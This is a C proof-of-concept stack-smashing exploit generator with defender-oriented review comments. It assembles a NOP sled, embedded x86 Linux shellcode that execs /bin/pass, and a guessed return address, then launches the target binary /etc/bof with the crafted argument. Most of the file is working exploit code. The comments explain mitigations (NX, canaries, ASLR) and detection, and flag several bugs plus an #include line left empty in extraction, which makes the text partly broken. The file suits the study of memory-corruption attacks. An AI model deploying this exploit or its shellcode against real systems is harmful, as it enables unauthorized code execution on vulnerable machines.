/*
 * Proof-of-concept stack-smashing exploit generator in the classic
 * "Smashing the Stack" layout: it builds one argument consisting of a
 * NOP sled, a small payload and a guessed return address, then exec's
 * the target program /etc/bof with that argument.
 *
 * Review notes (defender's view): this layout only works against a
 * target with an executable stack (no NX/W^X), no stack-protector
 * canary and a predictable stack address (no ASLR); default toolchain
 * and kernel hardening defeat all three, which is why the return
 * address has to be hand-guessed through argv[1]. The same program is a
 * convenient detection fixture: an argument that is mostly 0x90 bytes
 * followed by machine code is a high-signal indicator for this pattern.
 */

/* NOTE(review): the header name was lost in extraction. The calls below
 * (malloc, exit, atoi, perror, strlen, execl) need stdio.h, stdlib.h,
 * string.h and unistd.h - confirm against the original file. */
#include
/* Total size of the buffer handed to the target: sled + payload + address. */
#define DEFAULT_BUFFER_SIZE 80
/* x86 single-byte `nop`, used to pad the front of the buffer so an inexact
 * return-address guess can still land on harmless filler. */
#define NOP 0x90
/* Position-independent x86 Linux payload (the cd 80 bytes are `int 0x80`
 * system calls). Its trailing bytes 2f 62 69 6e 2f 70 61 73 73 are the
 * ASCII path "/bin/pass", the program it runs in place of the target. */
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x0c\x31\xc0\x88\x46\x09\x89\x46\x10\xb0\x0b\x89\xf3" "\x8d\x4e\x0c\x8d\x56\x10\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff\x2f\x62\x69\x6e\x2f\x70\x61\x73\x73";

/* Returns the current stack pointer so the address guess can be anchored
 * to it. The inline asm copies %esp into %eax and the function then falls
 * off the end with no return statement: that is undefined behaviour in C
 * and only "works" because i386 cdecl returns integers in %eax; an
 * optimising compiler is free not to honour it. i386-only. */
unsigned long get_sp(void) { __asm__("movl %esp,%eax"); }

/* Usage: <prog> <offset>. Builds the attack buffer described above and
 * replaces this process with /etc/bof, passing the buffer as its argv[1].
 * If execl fails the error is not reported and main simply falls off
 * the end. */
int main(int argc, char *argv[]) {
  unsigned char *buff, *ptr;
  long int *addr_ptr, address;
  int i, offset, bsize=DEFAULT_BUFFER_SIZE;
  if (!(buff = malloc(bsize))) { perror("malloc()"); exit(-1); }
  /* Argument count is checked only after the allocation; exit() follows,
   * so the un-freed buff is not a practical leak, just an ordering nit. */
  if(argc!=2) exit(-1);
  /* atoi reports no errors: a non-numeric argument silently becomes 0. */
  offset = atoi(argv[1]);
  /* Guessed address of the sled inside the target's stack: this process's
   * own %esp minus a caller-chosen offset. ASLR randomises exactly this. */
  address = get_sp() - offset;
  /* Layout: [ NOP sled ][ shellcode ][ address ]  (bsize bytes in total).
   * The bound mixes int i with size_t (strlen/sizeof), so the comparison
   * is unsigned: should strlen(shellcode)+sizeof(address) ever exceed
   * bsize the bound would wrap and this loop would overrun buff. */
  for (i = 0; i < bsize-strlen(shellcode)-sizeof(address); i++) buff[i] = NOP;
  ptr = buff + bsize - sizeof(address) - strlen(shellcode);
  for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
  /* Last sizeof(address) bytes: a single copy of the guessed address,
   * stored through a long* cast at whatever alignment ptr happens to have
   * (tolerated on x86, undefined behaviour on strict-alignment targets).
   * The post-increment on addr_ptr is dead; the pointer is never reused. */
  ptr = buff + bsize - sizeof(address);
  addr_ptr = (long *) ptr;
  *(addr_ptr++) = address;
  /* execl treats buff as a NUL-terminated string, but nothing writes a
   * terminator: the argument ends at the first zero byte inside `address`
   * or, failing that, at whatever the heap holds past the 80 bytes
   * (an over-read). The variadic sentinel should be `(char *)NULL` for
   * portability; plain NULL is only safe where int and pointer sizes
   * match. /etc/bof is the vulnerable target binary - presumably a lab
   * fixture, given the unusual location. */
  execl("/etc/bof", "bof", buff, NULL);
}